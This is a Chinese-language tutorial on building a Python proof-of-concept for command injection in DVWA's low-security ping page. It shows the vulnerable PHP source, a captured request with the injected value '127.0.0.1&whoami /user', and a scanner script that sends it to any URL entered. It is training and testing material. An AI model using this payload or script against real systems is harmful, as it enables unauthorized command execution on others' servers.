python DVWA命令注入POC练习

news2025/1/19 3:04:44

这里同样是抓包，访问DVWA低难度的命令注入


<?php

if( isset( $_POST[ 'Submit' ]  ) ) {
    // Get input
    $target = $_REQUEST[ 'ip' ];

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "<pre>{$cmd}</pre>";
}

?>

源码如上，可以看到对输入没有进行任何过滤，而且将结果输出到界面中

使用payload 127.0.0.1&whoami /user，可以看到SID这个特定值，后面可以根据SID来判断漏洞

抓包进行分析，根据数据包构建POC

POST /dv/vulnerabilities/exec/ HTTP/1.1

Host: 10.9.75.161

Content-Length: 43

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://10.9.75.161

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/exec/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close



ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit

构建target

POST /dv/vulnerabilities/exec/ HTTP/1.1

target=url+"/dv/vulnerabilities/exec/"

构造headers

Host: 10.9.75.161

Content-Length: 43

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: http://10.9.75.161

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://10.9.75.161/dv/vulnerabilities/exec/

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Cookie: security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3

Connection: close

headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
        }

构建data

ip=127.0.0.1%26whoami+%2Fuser&Submit=Submit

data={
            "ip":"127.0.0.1&whoami /user",
            "Submit":"Submit"
        }

构建最终POC

import requests

def command(url):
    try:
        target=url+"/dv/vulnerabilities/exec/"
        headers={
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Cookie": "security=low; BkGOp9578O_think_template=default; PHPSESSID=c1f788dc603a85146269756a943ab0c3"
        }
        data={
            "ip":"127.0.0.1&whoami /user",
            "Submit":"Submit"
        }
        res=requests.post(target,headers=headers,data=data)
        print(res.text)
        if "SID" in res.text:
            print("[+]",url,"存在命令注入漏洞")
        else:
            print("[-]",url,"未找到命令注入漏洞")
    except Exception as e:
        print("Error")
        print(e)
if __name__ == '__main__':
    url=input('请输入要检测的url：')
    command('http://'+url)

验证结果